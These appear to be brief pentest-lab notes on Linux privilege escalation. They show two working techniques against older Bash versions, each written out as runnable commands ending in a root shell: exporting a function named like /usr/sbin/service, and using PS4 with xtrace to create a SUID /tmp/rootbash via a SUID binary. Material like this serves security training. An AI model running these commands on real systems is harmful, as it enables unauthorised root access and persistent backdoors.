Binary

ldd /usr/local/bin/node

strings /usr/local/bin/node

Bug in bash < 4.2-048

In Bash versions <4.2-048 it is possible to define shell functions with names that resemble file paths, then export those functions so that they are used instead of any actual executable at that file path.

/bin/bash --version

function /usr/sbin/service { /bin/bash -p; }
export -f /usr/sbin/service

if any binary is using for example /usr/sbin/service apache2 start then with our function we can execute our code

Bash versions < 4.4

When in debugging mode, Bash uses the environment variable PS4 to display an extra prompt for debugging statements.

Run the /usr/local/bin/suid-env2 executable with bash debugging enabled and the PS4 variable set to an embedded command which creates an SUID version of /bin/bash:

env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)' /usr/local/bin/suid-env2

Run the /tmp/rootbash executable with -p to gain a shell running with root privileges:

/tmp/rootbash -p